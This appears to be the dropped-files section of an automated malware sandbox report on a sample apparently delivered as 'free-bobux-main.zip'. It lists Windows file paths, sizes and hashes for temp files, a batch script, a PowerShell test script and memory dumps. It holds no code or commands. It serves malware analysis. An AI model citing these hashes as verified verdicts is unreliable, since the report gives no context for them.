C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e7043d2af5dd899a8c2f5a6636ef96d5

SHA1
c428429d74bd22ea284cf382e027a5b29362554b

SHA256
e9d59e5ff0d12b9f177e3e5d4c380d012d6a1092e8282037b2eaded1ebe5ac0f

SHA512
d51e70e645f7633d737a8a88583698f34ef2a5005537d0b3700f5cb97b6f729264611a10999dacbe020982e7d26436f93ec9b5b0b64d6175ecd4d96419e8412d

Download Submit
C:\Users\Admin\AppData\Local\Temp\31dd90b9-d47c-4d12-b93c-2c77fe7111ef.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\32393feb-0773-4ec1-ae82-015b9919c71f.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E3.tmp\94E4.tmp\94E5.bat

Filesize
867B

MD5
addedb06062eef1e06beb01c81ede139

SHA1
fe92bda282254358c287991cd4020f393a3393fe

SHA256
98c6a0254f64be056923053dff9619232013371b7326bd539d5e1717d7844c3f

SHA512
a892597d9fed1cf6fb34d810ac3385a0e3c2ab03ecb09434eb2252d2cedc3f11c018a0d077a670113a18dcabeddb0f50fc6eda33b7e5ae078bf99d13e8874123

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_elhcwza4.m2h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir2940_533984441\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmsetup.log

Filesize
1KB

MD5
3d99bdffb872122debfcbf9be1902a8a

SHA1
0815f6fd169ce60f88fd5d3fe9395d6173610342

SHA256
6f9373fdb826e686a88278f748b8ab31fc28a520e2b86d353f3881cb1b6e8dd2

SHA512
20a875c1c7bde5bb237949e83991303b79b17bb7e88ff58df18aeea7aa66e46634cfba62f121be50640c72682fed428bdf60765da533f43aa5087f592120a272

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 714608.crdownload

Filesize
856B

MD5
9b52f6b0533f05686ed29b63a12a88b3

SHA1
25cf52a9a62253bc6566946dfac5d119e70b24f3

SHA256
7dc767c9996b5bcf4ecfec32ae92a66ee7eb92d85ca8fa294872a5890adf467f

SHA512
dcf6e90c06ce2bf65141ec1e0979fae9b2f8bfe8f6d0ee88028f691045d6ca59f0fba51df78c92453abd0f5208ef925752b920f80751bfca2726f71f9ae7e97b

Download Submit
C:\Users\Admin\Downloads\free-bobux-main.zip

Filesize
283KB

MD5
6238605d9b602a6cb44a53d6dc7ca40e

SHA1
429f7366136296dc67b41e05f9877ed762c54b73

SHA256
e315b421cb9bc6ae65fdeea180f5b12d2c4cf4117bf5872381bb20a1b28dbff9

SHA512
a8c5923c2e203cc2076030af51e4aa25f4c94b595a7f7d15c00c1c4e0eb91ae7734db9c3d59584642d18f5d63a8aecfadb06803a990ec51b668d3d93a079b1a7

Download Submit
memory/2120-35-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/2120-52-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/2120-36-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/2120-32-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/2120-33-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/2120-34-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/2120-31-0x0000000006DD0000-0x0000000006DE0000-memory.dmp

Filesize
64KB

Download
memory/5604-403-0x000002747E270000-0x000002747E292000-memory.dmp

Filesize
136KB

Download
memory/5604-416-0x000002747E2D0000-0x000002747E318000-memory.dmp

Filesize
288KB

Download